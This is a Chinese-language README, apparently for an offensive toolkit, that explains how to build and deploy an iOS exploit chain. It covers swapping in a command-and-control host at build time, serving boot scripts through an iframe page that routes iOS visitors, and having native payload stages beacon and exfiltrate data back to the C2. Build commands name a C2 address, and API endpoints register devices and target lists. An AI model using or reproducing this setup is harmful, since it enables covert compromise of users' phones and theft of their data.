17 lines
1012 B
Markdown
17 lines
1012 B
Markdown
# channel-builder-ds
|
|
|
|
`source/` 是 one99/raw 的利用树。构建只做 C2 主机字符串替换,再拷到 `public/next-chain`。
|
|
|
|
**页面请求不跨域:** 浏览器里发出的 `/api/ds/log` `/api/ds/chain-targets` `/api/ds/device/register` 一律用当前页面 `location.origin`。
|
|
**资源域名不配置:** 静态资源用当前 weifile 的 `location.origin + /next-chain`。
|
|
**C2 可配置:** `php artisan ds:build --c2 …` 只改 native PE 的 `/beacon` `/war` `/stats` 和 `NEWS2_CONFIG.exfil`(CFNetwork 回连),不影响页面 XHR。
|
|
|
|
weifile(本身已是 iframe)按 iOS 路由后直接 `loadScript` `config.js` + `boot.js`,不再套一层 iframe。渠道 ID 与 weifile 相同:`/channel/X.Y.ZZ/`。
|
|
|
|
```bash
|
|
php artisan ds:build --c2 http://192.168.31.130:8000
|
|
php artisan xxbb:repack
|
|
```
|
|
|
|
PE 进度:`GET /api/ds/pe-stage/{name}.js` 打到 C2(记日志并吐 JS)。`public/next-chain/pe_stage/` 仍随 `ds:build` 发布,但客户端不再走这条静态路径。
|